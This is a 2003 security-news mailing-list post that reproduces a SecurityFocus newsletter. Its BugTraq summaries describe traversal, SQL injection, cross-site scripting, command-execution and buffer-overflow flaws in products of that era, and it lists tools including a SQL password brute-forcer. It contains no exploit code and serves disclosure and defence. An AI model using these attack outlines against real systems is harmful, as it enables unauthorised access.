|
[NEWS:] GN SecNews Vol #1
|
Vijay Kumar
|
Jan 25, 2003 22:42 PST
|
GN SecNews Vol #1
-----------------
News Article Type: Weekly
Author: vijay (vijay-@users.sourceforge.net)
Date: Sat Jan 25 19:46:05 IST 2003
Please send in your comments and suggestions for improvement.
Disclaimer: This is a compilation of Security News Articles/Advisories from various GNU/Linux Providers, Developers and Users. The Author(s) of this article makes no warranties of any kind whatsoever with respect to the information contained from the sources. The information given here is as is from the source with the PGP signature if available.
===============================================================================
Contents
========
SecurityFocus Newsletter #180
SuSE Security Announcement
iDEFENSE Security Advisory 01.21.03
===============================================================================
SecurityFocus Newsletter #180
-----------------------------
This issue is sponsored by: Qualys
Strengthening Network Security: FREE Guide Network security is a
constantly moving target - even proven solutions lose their punch over
time. Find out how to get COMPLETE PROTECTION against ever-growing
security threats with our FREE new Guide.
Get your copy today at: https://www.qualys.com/forms/nsguideh_376.php
-------------------------------------------------------------------------------
I. FRONT AND CENTER
1. Exchange 2000 in the Enterprise: Tips and Tricks Part Two
2. The Curmudgeon's Crystal Ball: Security Predictions for 2003
3. Open Source Honeypots: Learning with Honeyd
4. SecurityFocus DPP Program
5. InfoSec World Conference and Expo/2003 (March 10-12,2003,Orlando,FL)
II. BUGTRAQ SUMMARY
1. Xynph FTP Server Relative Path Directory Traversal Vulnerability
2. BitMover BitKeeper Daemon Mode Remote Command Execution...
3. BitMover BitKeeper Local Temporary File Race Condition...
4. BitMover BitKeeper Local Insecure Temporary File Permissions...
5. YABB SE Reminder.PHP SQL Injection Vulnerability
6. Stunnel Unspecified SIGCHLD Signal Handler Vulnerability
7. phpPass AccessControl.PHP SQL Injection Vulnerability
8. W-Agora Remote File Disclosure Vulnerability
9. mpg123 Invalid MP3 Header Memory Corruption Vulnerability
10. Cyboards PHP Lite Remote File Include Vulnerability
11. Cyboards PHP Lite Multiple Cross Site Scripting Vulnerabilities
12. Solaris UUCP Local Buffer Overflow Vulnerability
13. Symantec Norton Internet Security ICMP Packet Flood Denial Of...
14. Geeklog Profiles.PHP Multiple Cross-Site Scripting...
15. Geeklog Users.PHP Cross-Site Scripting Vulnerability
16. Geeklog Comment.PHP Cross-Site Scripting Vulnerability
17. Geeklog Homepage User Field HTML Injection Vulnerability
18. vAuthenticate Remote SQL Injection Vulnerability
19. vSignup Remote SQL Injection Vulnerability
20. Psunami Bulletin Board Psunami.CGI Remote Command Execution...
21. D-Link DWL-900AP+ Firmware Upgrade Configuration Reset...
22. HTML Forms Generation And Validation Forms.PHP HTML Injection...
23. Trend Micro OfficeScan CGI Directory Insufficient Permissions...
24. Trend Micro Virus Control System Denial Of Service Vulnerability
25. Trend Micro Virus Control System Information Disclosure...
III. SECURITYFOCUS NEWS ARTICLES
1. Rumsfeld orders .mil Web lockdown
2. MS seeks malware, bust phones after SPV security crack
3. Discarded computer hard drives prove a trove of personal info
4. BBC in ironic virus infection
IV. SECURITYFOCUS TOP 6 TOOLS
1. ForceSQL v2.0
2. SMAC v1.0
3. Active@ File Recovery v2.0
4. NBTdeputy v1.0
5. APD v1
6. mysql_auth v0.5
V. SECURITYJOBS LIST SUMMARY
1. Senior Identity Manager - Cleveland, Ohio (Thread)
2. Policy, Procedure, and Compliance Senior Manager - Cleveland...
3. Vulnerability Manager (Thread)
4. Senior Enterprise Security Manager position in PA (Thread)
5. Security Engineer (Thread)
6. WANTED - Senior Sales Exec - New York (Tri-State Area) (Thread)
7. Vice President of Business Development (Thread)
8. Security System Engineer - Baltimore/Washington DC (Thread)
9. Security Engineer -- San Diego (Thread)
10. Senior Security Engineer - Baltimore/Wshington DC (Thread)
11. Seeking information security opportunity in - CA/ LA (CISSP)...
12. Lead Business Development/Security Consultant(s) - UK (Thread)
13. Seeking Information Security employment (Thread)
14. Senior Federal Territory Manager (Thread)
15. Information Security Analyst (Thread)
16. IDS Signature Engineer needed now! (revised) (Thread)
17. IDS Signature Engineer needed now! (Thread)
18. Security Position with Bristol-Myers Squibb-Hopewell-NJ (Thread)
19. Seeking internship or entry-level position (Thread)
20. Looking for a security based role (no expierence) (Thread)
21. @stake Employment in Seattle (Thread)
22. Looking for security job opportunity in Northern...
VI. INCIDENTS LIST SUMMARY
1. Hacked web server (Thread)
2. Virus? Trojan? (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
1. NO NEW POSTS FOR THE WEEK ENDING 01.17.03
VIII. MICROSOFT FOCUS LIST SUMMARY
1. AD replication over WAN (Thread)
2. SecurityFocus Microsoft Newsletter #120 (Thread)
3. AD replication (Thread)
4. Understaing Event Details in Windows NT (Thread)
5. FW: AD replication over WAN (Thread)
IX. SUN FOCUS LIST SUMMARY
1. NO NEW POSTS FOR THE WEEK ENDING 01.17.03
X. LINUX FOCUS LIST SUMMARY
1. How to build CD with chkrootkit on it? (Thread)
XI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Exchange 2000 in the Enterprise: Tips and Tricks Part Two
By Tim Mullen
This is the second installment in a two-part series on securing Exchange
2000 in the enterprise. In the first part, we finished up building a
messaging infrastructure that handled many of the issues mail
administrators must contend with. This segment will address the security
ramifications of publishing mail content to the Internet via Outlook Web
Access.
http://online.securityfocus.com/infocus/1658
2. The Curmudgeon's Crystal Ball: Security Predictions for 2003
By Richard Forno
As we ring in the new year, it's in with the new and out with the old. Or
is it? Our fearless forecaster thinks not.
http://online.securityfocus.com/columnists/135
3. Open Source Honeypots: Learning with Honeyd
by Lance Spitzner
Honeypots are an exciting new technology. They allow us to turn the tables
on the bad guys, we can take the initiative. In the past several years
there has been growing interest in exactly what this technology is and how
it works. The purpose of this paper is to introduce you to honeypots and
demonstrate their capabilities. We will begin by discussing what a
honeypot is and how it works, then go into detail using the OpenSource
solution Honeyd.
http://online.securityfocus.com/infocus/1659
4. SecurityFocus DPP Program
Attention Universities!! Sign-up now for preferred pricing on the only
global early-warning system for cyber attacks - SecurityFocus DeepSight
Threat Management System.
Click here for more information:
http://www.securityfocus.com/corporate/products/dpsection.shtml
5. InfoSec World Conference and Expo/2003 (March 10-12, 2003, Orlando, FL)
Optional Workshops March 8, 9, 12, 13, & 14 Vendor Expo March 10 & 11
Solutions to todays security concerns; hands-on experts; blockbuster
vendor expo; the CISO Executive Summit; invaluable networking
opportunities. InfoSec World has it all!
Go to: http://www.misti.com/10/os03nl37inf.html
II. BUGTRAQ SUMMARY
-------------------
1. Xynph FTP Server Relative Path Directory Traversal Vulnerability
BugTraq ID: 6587
Remote: Yes
Date Published: Jan 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6587
Summary:
Xynph FTP Server is a shareware FTP server available for Microsoft Windows
operating systems.
A problem in Xynph FTP Server may allow a remote user to gain access to
unauthorized resources.
A problem with the handling of input has been reported in Xynph FTP
Server. Under some circumstances, it may be possible for a remote user to
escape the FTP root directory using relative path notation. This could
allow unauthorized access to systems using the vulnerable software.
It should be noted that this problem may allow an attacker to download
arbitrary files on the vulnerable system. Additionally, the attacker
would be able to access any files on the system to which the FTP server
has access rights, which may be run with SYSTEM privileges in some
configurations.
2. BitMover BitKeeper Daemon Mode Remote Command Execution Vulnerability
BugTraq ID: 6588
Remote: Yes
Date Published: Jan 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6588
Summary:
BitKeeper is a source code management system by BitMover. It is available
for Unix, Linux, and Microsoft Windows operating systems.
A problem with BitKeeper may make remote command execution possible.
It has been reported that BitKeeper is vulnerable to an input validation
bug. When the software is run in daemon mode, it starts a service with an
interface that can be connected to via HTTP. By sending specially crafted
input to the service, it is possible to execute abitrary commands.
The program does not properly filter single quotes. As a result, commands
contained between quotes will be executed on the host running the
vulnerable software. Any commands executed between quotes will be
executed with the privileges of the BitKeeper daemon process.
3. BitMover BitKeeper Local Temporary File Race Condition Vulnerability
BugTraq ID: 6589
Remote: No
Date Published: Jan 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6589
Summary:
BitKeeper is a source code management system by BitMover. It is available
for Unix, Linux, and Microsoft Windows operating systems.
A problem with BitKeeper may make local symbolic link attacks possible.
It has been reported that BitKeeper is vulnerable to a race condition
error. Under some circumstances, BitKeeper creates files in the temporary
directory. However, it may be possible to create a symbolic link in a
crucial point of program execution that would result in the overwriting of
files at the end of the link.
The program does not properly open the temporary file. Rather than
performing the check and opening the file all in one function, the program
first checks, then in a seperate function opens the file. This creates a
window of attack that could result in the overwriting of files that are
write-accessible to the BitKeeper process.
4. BitMover BitKeeper Local Insecure Temporary File Permissions Vulnerability
BugTraq ID: 6590
Remote: No
Date Published: Jan 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6590
Summary:
BitKeeper is a source code management system by BitMover. It is available
for Unix, Linux, and Microsoft Windows operating systems.
A problem with BitKeeper may make the destruction or injection of
information possible.
It has been reported that BitKeeper insecurely creates temporary files.
Under some circumstances, BitKeeper creates files in the temporary
directory. However, these files are created with world-writable
permissions, which may allow the removal of these files, or injection of
data into them.
5. YABB SE Reminder.PHP SQL Injection Vulnerability
BugTraq ID: 6591
Remote: Yes
Date Published: Jan 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6591
Summary:
YaBB SE is a freely available, open source port of Yet Another Bulletin
Board (YaBB). It is available for Unix, Linux, and Microsoft Operating
Systems.
A problem with YaBB SE could make it possible for a remote user launch SQL
injection attacks.
It has been reported that a problem exists in the Reminder.php script
distributed as part of YaBB SE. Due to insufficient sanitizing of input,
it is possible for a remote user to inject arbitrary SQL into the database
used by YaBB SE that could be used to reset or change the password of a
user.
This problem may allow a remote user to change the password of the
administrative user of an instance of YaBB SE. It may also allow a remote
user to gain other information from SQL databases used to backend YaBB SE.
6. Stunnel Unspecified SIGCHLD Signal Handler Vulnerability
BugTraq ID: 6592
Remote: No
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6592
Summary:
Stunnel is a freely available, open source cryptography wrapper. It is
designed to wrap arbitrary protocols that may or may not support
cryptography. It is maintained by the Stunnel project.
A vulnerability has been reported for Stunnel. The vulnerability exists in
the SIGCHLD signal handling routine. Reportedly, some functions in the
signal handler are used in an unsafe manner.
Precise technical details of this vulnerability are currently unknown.
This BID will be updated as further information is available.
This vulnerability has been reported to affect Stunnel versions prior to
4.04.
7. phpPass AccessControl.PHP SQL Injection Vulnerability
BugTraq ID: 6594
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6594
Summary:
phpPass is a system that allows restrictions to web pages. It is
implemented in PHP and is available for a variety of platforms.
A problem with phpPass may allow an attacker to launch a SQL injection
attack.
The vulnerability exists in the accesscontrol.php script included with
phpPass. Due to insufficient sanitization of user-supplied input, it is
possible for a remote user to inject arbitrary SQL into the database used
by a vulnerable site. This may allow an attacker to view pages that would
normally be restricted.
SQL injection attacks may also potentially be used to exploit latent
vulnerabilities in the underlying database implementation.
This vulnerability was reported for phpPass 2. It is not known whether
other versions are affected.
8. W-Agora Remote File Disclosure Vulnerability
BugTraq ID: 6595
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6595
Summary:
W-Agora is a freely available, open source PHP forum software package. It
is available for Unix and Linux systems.
A file disclosure vulnerability has been reported for W-Agora. Reportedly,
some scripts included with W-Agora do not adequately sanitize some
user-supplied input. The vulnerability was reported to exist in the
index.php and modules.php script files.
An attacker can construct a URL consisting of dot-dot-slash (../)
character sequences to obtain access to files outside of the document
root. It should be noted that only files accessible by the web server will
be disclosed to the attacker.
Exploitation of this vulnerability may lead to disclosure of sensitive
information that may be useful in mounting further attacks on the host
system.
This vulnerability affects W-Agora 4.1.5.
9. mpg123 Invalid MP3 Header Memory Corruption Vulnerability
BugTraq ID: 6593
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6593
Summary:
mpg123 is a MPEG audio player for Linux variant operating systems.
A memory corruption vulnerability has been reported for mpg123 that may
result in code execution.
The vulnerability exists when mpg123 is used to play certain MP3 files.
Specifically, when playing MP3 files with malformed or overly large
headers, it may be possible to cause mpg123 to execute malicious
attacker-supplied code.
The file common.c defines MAX_INPUT_FRAMESIZE to a value of 1920 bytes. An
attacker can exploit this vulnerability by creating a malicious MP3 file
that contains headers consisting of greater than 1920 bytes. When mpg123
is used to play this corrupted MP3 file, it will trigger the buffer
overflow condition. Any attacker supplied code will be executed with the
privileges of the mpg123 process.
This vulnerability has been reported to affect mpg123pre0.59s.
10. Cyboards PHP Lite Remote File Include Vulnerability
BugTraq ID: 6597
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6597
Summary:
A vulnerability has been discovered in Cyboards PHP Lite. Due to
insufficient sanitization of user-supplied variables by the
'default_header.php' and 'options_form.php' scripts, it is possible for a
remote attacker to include a malicious PHP file in a URL.
By placing a script on an attacker-controlled host and mimicking the name
and directory structure of the server, it is possible to cause a
vulnerable server to include the file.
It may be possible to exploit this issue to execute arbitrary commands
with the privileges of the target server.
11. Cyboards PHP Lite Multiple Cross Site Scripting Vulnerabilities
BugTraq ID: 6596
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6596
Summary:
Multiple cross site scripting vulnerabilities have been discovered in
Cyboards PHP Lite. These issues occur due to insufficient validation of
user supplied values.
It is possible for a remote attacker to create a malicious link containing
script code that will be executed in the browser of a legitimate user. All
code will be executed within the context of the website running Cyboards
PHP Lite.
This issue affects the following PHP scripts:
include/default_header.php
include/options_form.php
adminopts/login_form.php
adminopts/include/ban_form.php
adminopts/include/board_form.php
adminopts/include/login_form.php
adminopts/include/vip_form.php
This issue could be exploited to steal a legitimate users cookie-based
authentication credentials. Information gained in this manner could be
later used to hijack a legitimate users web session.
12. Solaris UUCP Local Buffer Overflow Vulnerability
BugTraq ID: 6600
Remote: No
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6600
Summary:
UUCP is the Unix-to-Unix Copy Protocol infrastructure, implmented with
numerous Unix and Unix clone operating systems.
A vulnerability has been discovered in the Solaris implementation of UUCP.
The problem is due to insufficient bounds checking of user-supplied
filenames. By passing excessive data as an argument for the '-s' command
line parameter it is possible to trigger a buffer overflow. By exploiting
this issue to overwrite sensitive locations in memory, it may be possible
for an attacker to execute arbitrary code.
As UUCP is installed setuid root this would result in the execution of
attacker-supplied commands with the privileges of the superuser.
13. Symantec Norton Internet Security ICMP Packet Flood Denial Of Service Vulnerability
BugTraq ID: 6598
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6598
Summary:
Symantec Norton Internet Security is a suite of commercial security
utilities including Norton Personal Firewall and Norton Antivirus.
Symantec Norton Internet Security 2003 is reported to be prone to a denial
of service condition.
It is possible to trigger this condition by sending an excessive
(approximately 65500 or more) number of ICMP packets to a host running
Norton Internet Security. This may cause a denial of service and possible
system instability.
For this issue to be present, the software must be configured to allow
ICMP packets and the firewall must be enabled.
It is not known if earlier versions of the software are also affected by
this vulnerability.
14. Geeklog Profiles.PHP Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 6601
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6601
Summary:
Geeklog is freely available, open-source weblog software. It is written in
PHP and will run on most Unix and Linux variants, as well as Microsoft
Windows operating systems.
The Geeklog 'profiles.php' script is prone to multiple cross-site
scripting vulnerabilities.
This issue is due to insufficient sanitization of input submitted in URI
parameters. This input will be displayed in webpages generated by
Geeklog. As a result, an attacker may create a malicious link to a site
hosting Geeklog, which contains malicious HTML or script code.
When such a link is visited by an unsuspecting user, attacker-supplied
script code will be interpreted by their web client in the security
context of the site hosting Geeklog.
Exploitation of this issue may enable an attacker to steal cookie-based
authentication credentials from legitimate users of the software. Other
attacks are also possible.
15. Geeklog Users.PHP Cross-Site Scripting Vulnerability
BugTraq ID: 6602
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6602
Summary:
Geeklog is freely available, open-source weblog software. It is written in
PHP and will run on most Unix and Linux variants, as well as Microsoft
Windows operating systems.
Geeklog is prone to a cross-site scripting vulnerability in the
'users.php' script.
This issue is due to insufficient sanitization of input submitted in URI
parameters. This input will be displayed in webpages generated by
Geeklog. As a result, an attacker may create a malicious link to a site
hosting Geeklog, which contains malicious HTML or script code.
When such a link is visited by an unsuspecting user, attacker-supplied
script code will be interpreted by their web client in the security
context of the site hosting Geeklog.
Exploitation of this issue may enable an attacker to steal cookie-based
authentication credentials from legitimate users of the software. Other
attacks are also possible.
16. Geeklog Comment.PHP Cross-Site Scripting Vulnerability
BugTraq ID: 6603
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6603
Summary:
Geeklog is freely available, open-source weblog software. It is written in
PHP and will run on most Unix and Linux variants, as well as Microsoft
Windows operating systems.
Geeklog is prone to a cross-site scripting vulnerability in the
'comment.php' script.
This issue is due to insufficient sanitization of input submitted in URI
parameters. This input will be displayed in webpages generated by
Geeklog. As a result, an attacker may create a malicious link to a site
hosting Geeklog, which contains malicious HTML or script code.
When such a link is visited by an unsuspecting user, attacker-supplied
script code will be interpreted by their web client in the security
context of the site hosting Geeklog.
Exploitation of this issue may enable an attacker to steal cookie-based
authentication credentials from legitimate users of the software. Other
attacks are also possible.
17. Geeklog Homepage User Field HTML Injection Vulnerability
BugTraq ID: 6604
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6604
Summary:
Geeklog is freely available, open-source weblog software. It is written in
PHP and will run on most Unix and Linux variants, as well as Microsoft
Windows operating systems.
Geeklog is prone to HTML injection attacks.
The user account 'Homepage' field is not sufficiently sanitized of HTML
and script code. As a result, a malicious user may inject malicious HTML
and script code into this field when editing their user information.
When the malicious user's account information is displayed to other web
users, the attacker-supplied code will be interpreted in their web client
in the security context of the site hosting the vulnerable software.
Exploitation of this issue may enable an attacker to steal cookie-based
authentication credentials from legitimate users of the software. Other
attacks are also possible.
18. vAuthenticate Remote SQL Injection Vulnerability
BugTraq ID: 6605
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6605
Summary:
vAuthenticate is an authentication script that uses PHP and MySQL. It is
available for the Microsoft Windows, Linux, and Unix operating systems.
A vulnerability has been discovered in vAuthenticate. It has been reported
that the 'auth.php' fails to sufficiently sanitize user-supplied
variables, making various PHP files prone to SQL injection attacks. This
may make it possible for an unauthorized to access protected documents.
The 'chgpwd.php' and 'admin/index.php' scripts are affected by this issue.
An attacker that is able to access protected web pages may gain sensitive
information that may aid in launching further attacks against a target
server.
SQL injection attacks may also potentially be used to exploit latent
vulnerabilities in the underlying database implementation.
This vulnerability was reported for vAuthenticate 2.8.
19. vSignup Remote SQL Injection Vulnerability
BugTraq ID: 6606
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6606
Summary:
vAuthenticate is an authentication script that uses PHP and MySQL. It is
available for the Microsoft Windows, Linux, and Unix operating systems.
A vulnerability has been discovered in vSignup. It has been reported that
the 'auth.php' fails to sufficiently sanitize user-supplied variables,
making various PHP files prone to SQL injection attacks. This may make it
possible for an unauthorized to access protected documents. The
'chgpwd.php' and 'admin/index.php' scripts are affected by this issue.
An attacker that is able to access protected web pages may gain sensitive
information that may aid in launching further attacks against a target
server.
SQL injection attacks may also potentially be used to exploit latent
vulnerabilities in the underlying database implementation.
This vulnerability was reported for vSignup 2.1.
20. Psunami Bulletin Board Psunami.CGI Remote Command Execution Vulnerability
BugTraq ID: 6607
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6607
Summary:
Psunami is bulletin board software. It is implemented in Perl and is
available for Unix and Linux variants.
Psunami Bulletin Board is prone to a remote command execution
vulnerability. This issue is present in the 'psunami.cgi' script.
Psunami does not sufficiently sanitize shell metacharacters from query
strings. Input supplied via the 'topic' URI parameter will be passed to a
Perl open() call. As a result, it may be possible for a remote attacker
to execute arbitrary commands in the context of the webserver process.
A remote attacker may exploit this condition to gain local, interactive
access to the underlying host.
21. D-Link DWL-900AP+ Firmware Upgrade Configuration Reset Vulnerability
BugTraq ID: 6609
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6609
Summary:
The DWL-900AP+ is a wireless access point manufactured by D-Link which is
capable of speeds up to 22Mbps. A vulnerability has been discovered in the
DWL-900AP+.
The D-Link AirPlus Access Point Manager is used for various adminstrative
tasks including firmware upgrades. It has been reported that upgrading the
DWL-900AP+ firmware with this software will cause all configuration
settings to be reset to factory defaults.
This poses as a security risk as an unknowing user may upgrade there
device and leave their device accessible with a publically known
adminstrator password.
22. HTML Forms Generation And Validation Forms.PHP HTML Injection Vulnerability
BugTraq ID: 6608
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6608
Summary:
The HTML Forms Generation And Validation package is a freely available,
open source PHP package. It is written and maintained by Manuel Lemos.
A problem with HTML Forms Generation And Validation could make HTML
injection attacks possible.
It has been reported that the forms.php component of HTML Forms Generation
And Validation does not properly check input. Because of this, an
attacker could potentially launch HTML injection attacks indirectly via
form fields.
This may allow for malicious script code to be inadvertently executed in
the browser of a user who views pages which include attacker-supplied HTML
and script code.
23. Trend Micro OfficeScan CGI Directory Insufficient Permissions Vulnerability
BugTraq ID: 6616
Remote: Yes
Date Published: Jan 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6616
Summary:
Trend Micro OfficeScan is an enterprise-level centrally managed antivirus
solution.
A vulnerability has been reported for Trend Micro OfficeScan that may
allow attackers to access programs residing in the cgi directory of the
OfficeScan installation.
An attacker can exploit this vulnerability by making a request to any
programs in the 'cgi' directory by a HTTP request. Some of these programs,
such as the 'cgiChkMasterPwd.exe', allow an attacker to access
OfficeScan's pages with administrative access. This may allow an attacker
to modify or disable OfficeScan functionality.
24. Trend Micro Virus Control System Denial Of Service Vulnerability
BugTraq ID: 6617
Remote: Yes
Date Published: Jan 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6617
Summary:
Trend Micro Virus Control System (TVCS) is a Web based management system
that allows administrators to configure, monitor and maintain anti-virus
programs on a network.
A denial of service vulnerability has been reported for TVCS. The
vulnerability occurs when numerous requests for 'activesupport.exe' are
made.
An attacker can exploit this vulnerability by making a request for the
'/tvcs/activesupport.exe' service. This will result in the web server
failing to respond for a limited period of time. Subsequent requests will
ensure that the web server will fail to respond for an indefinite period
of time.
This vulnerability has been reported to affect older versions of Trend
Micro TVCS. The TVCS system has been replaced by TMCM (Trend Micro Control
Manager) which is reportedly not vulnerable to this issue.
25. Trend Micro Virus Control System Information Disclosure Vulnerability
BugTraq ID: 6618
Remote: Yes
Date Published: Jan 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6618
Summary:
Trend Micro Virus Control System (TVCS) is a Web based management system
that allows administrators to configure, monitor and maintain anti-virus
programs on a network.
An information disclosure vulnerability has been reported for TVCS.
Reportedly, it is possible for an attacker to access the log files
generated by TVCS. The log files contain very sensitive information about
the system, including user names and passwords.
Any information obtained in this manner may be used by an attacker to
launch further destructive attacks against a system.
This vulnerability has been reported to affect older versions of Trend
Micro TVCS. The TVCS system has been replaced by TMCM (Trend Micro Control
Manager) which is reportedly not vulnerable to this issue.
III. SECURITYFOCUS NEWS AND COMMENTARY
------------------------------------------
1. Rumsfeld orders .mil Web lockdown
By Kevin Poulsen
The defense secretary cites an al Qaeda training manual in ordering the
armed services to strip official Web sites of information that could aid
the enemy.
http://online.securityfocus.com/news/2062
2. MS seeks malware, bust phones after SPV security crack
By John Lettice, The Register
A quite bizarre CNET report reveals that Microsoft's Security Response
Center began investigations into the circumvention of security on the SPV
smartphone on Tuesday, searching - so says CNET, anyway - for reports of
rogue programs on the network and damaged phones.
http://online.securityfocus.com/news/2059
3. Discarded computer hard drives prove a trove of personal info
By Justin Pope, The Associated Press
So, you think you cleaned all your personal files from that old computer
you got rid of? Two graduate students at the Massachusetts Institute of
Technology suggest you think again.
http://online.securityfocus.com/news/2055
4. BBC in ironic virus infection
By John Leyden, The Register
The BBC fell victim to the latest variant of the ExploreZip worm, and a
certain amount of hubris, last week.
http://online.securityfocus.com/news/2052
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. ForceSQL v2.0
by Network Intelligence India Pvt. Ltd.
Relevant URL:
http://www.nii.co.in/tools.html
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
forceSQL is a password auditing tool for MS SQL Servers. It audits
accounts by guessing passwords on SQL Databases. It uses both brute-force
and dictionary attacks. It works much faster than other such tools because
it bypasses the SQL ODBC API and talks directly to the network layer by
constructing its own login packets.
2. SMAC v1.0
by KLC Consulting Security Team
Relevant URL:
http://www.klcconsulting.net/smac/
Platforms: Windows 2000, Windows XP
Summary:
SMAC is a free GUI tool, which allows users to change MAC address for
almost any Network Interface Cards (NIC) on the Windows 2000 and XP
systems, whether the manufactures allow this option or not.
SMAC does not change the hardware burned-in MAC addresses. It is not
necessary. SMAC changes the "software based" MAC addresses on the Windows
2000 & XP systems, and the new MAC addresses you change will sustain from
the reboots.
3. Active@ File Recovery v2.0
by Active@ Data Recovery Services
Relevant URL:
http://www.file-recovery.net/
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Active@ File Recovery is a powerful software utility, designed to restore
accidentally deleted files and directories. It allows you to recover files
that have been deleted from the Recycle Bin, as well as those deleted
after avoiding the Recycle Bin (e.g. Shift-Delete).
4. NBTdeputy v1.0
by urity uri-@securityfriday.com
Relevant URL:
http://www.securityfriday.com/ToolDownload/NBTdeputy/nbtdeputy_doc.html
Platforms: Windows 2000
Summary:
NBTdeputy register a NetBIOS computer name on the network and is ready to
respond to NetBT name-query requests. NBTdeputy helps to resolve IP
address from NetBIOS computer name. It's similar to Proxy ARP.
5. APD v1
by teknop
Relevant URL:
http://apd.sourceforge.net/
Platforms: POSIX
Summary:
APD is an promiscuous node detection tool which uses ARP packets to
determine whether or not a host is in promiscuous mode. This project is
based of the work of securityfriday.
6. mysql_auth v0.5
by HEGEDUS, Ervin
Relevant URL:
http://people.fsn.hu/~airween/mysql_auth/
Platforms: UNIX
Summary:
mysql_auth is a basic authenticator for Squid Proxy. You can configure all
MySQL variables for your existing user/password database (dbhost, dbadmin,
dbpasswd, dbname, tablename, columns name), or create a new database. It
includes a utility called mypasswd that updates your database.
V. SECURITY JOBS SUMMARY
------------------------
1. Senior Identity Manager - Cleveland, Ohio (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306912
2. Policy, Procedure, and Compliance Senior Manager - Cleveland, Ohio (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306914
3. Vulnerability Manager (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306920
4. Senior Enterprise Security Manager position in PA (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306906
5. Security Engineer (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306954
6. WANTED - Senior Sales Exec - New York (Tri-State Area) (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306743
7. Vice President of Business Development (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306739
8. Security System Engineer - Baltimore/Washington DC (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306775
9. Security Engineer -- San Diego (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306731
10. Senior Security Engineer - Baltimore/Wshington DC (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306507
11. Seeking information security opportunity in - CA/ LA (CISSP) (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306492
12. Lead Business Development/Security Consultant(s) - UK (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306666
13. Seeking Information Security employment (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306443
14. Senior Federal Territory Manager (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306354
15. Information Security Analyst (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306353
16. IDS Signature Engineer needed now! (revised) (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306352
17. IDS Signature Engineer needed now! (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306173
18. Security Position with Bristol-Myers Squibb-Hopewell-NJ (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306308
19. Seeking internship or entry-level position (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306144
20. Looking for a security based role (no expierence) (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306194
21. @stake Employment in Seattle (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306101
22. Looking for security job opportunity in Northern California/Central Valley. (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306100
VI. INCIDENTS LIST SUMMARY
-------------------------
1. Hacked web server (Thread)
Relevant URL:
http://online.securityfocus.com/archive/75/306624
2. Virus? Trojan? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/75/306370
VII. VULN-DEV RESEARCH LIST SUMMARY
----------------------------------
1. NO NEW POSTS FOR THE WEEK ENDING 01.17.03
VIII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. AD replication over WAN (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/306896
2. SecurityFocus Microsoft Newsletter #120 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/306905
3. AD replication (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/306717
